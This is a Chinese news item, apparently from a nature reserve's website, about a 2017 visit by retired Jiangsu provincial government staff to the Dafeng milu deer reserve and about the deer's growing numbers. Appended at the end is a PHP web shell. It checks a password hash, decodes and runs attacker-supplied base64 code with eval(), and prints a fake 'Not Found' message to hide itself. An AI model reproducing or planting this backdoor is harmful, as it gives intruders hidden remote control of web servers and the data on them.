最新要闻

首页 > 最新要闻 >

    江苏省政府办公厅老干部一行来保护区参观考察

               2017年4月21日,江苏省政府原副省长张九汉率江苏省政府办公厅部分老干部一行40人来大丰麋鹿保护区参观考察。盐城市委常委、大丰区委书记王荣等陪同考察。

    张省长一行首先在中华麋鹿园接待室内观看了麋鹿电教片《归来的麋鹿》,随后乘坐电瓶游览车进入半野生麋鹿生活区,近距离感受麋鹿的湿地生活环境。

    考察中,张省长对麋鹿数量的不断增长既兴奋又担忧。兴奋的是麋鹿从1986年回归的39头,繁衍至今,增长了80倍,当下正处于麋鹿的产仔期,数量会再次被刷新,而担忧的是仅4万亩的土地却承载着3200多头的麋鹿,就土地而言已经是“超负荷运转”了。

     

    江苏省大丰麋鹿国家级自然保护区管理处副主任沈华表示,麋鹿保护区一直积极寻求与探索有效保护珍稀物种和合理利用自然资源的切入点,遵循“以科研促保护”的治区方针,在麋鹿科学研究的道路上,不断探索种群发展的新课题。

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>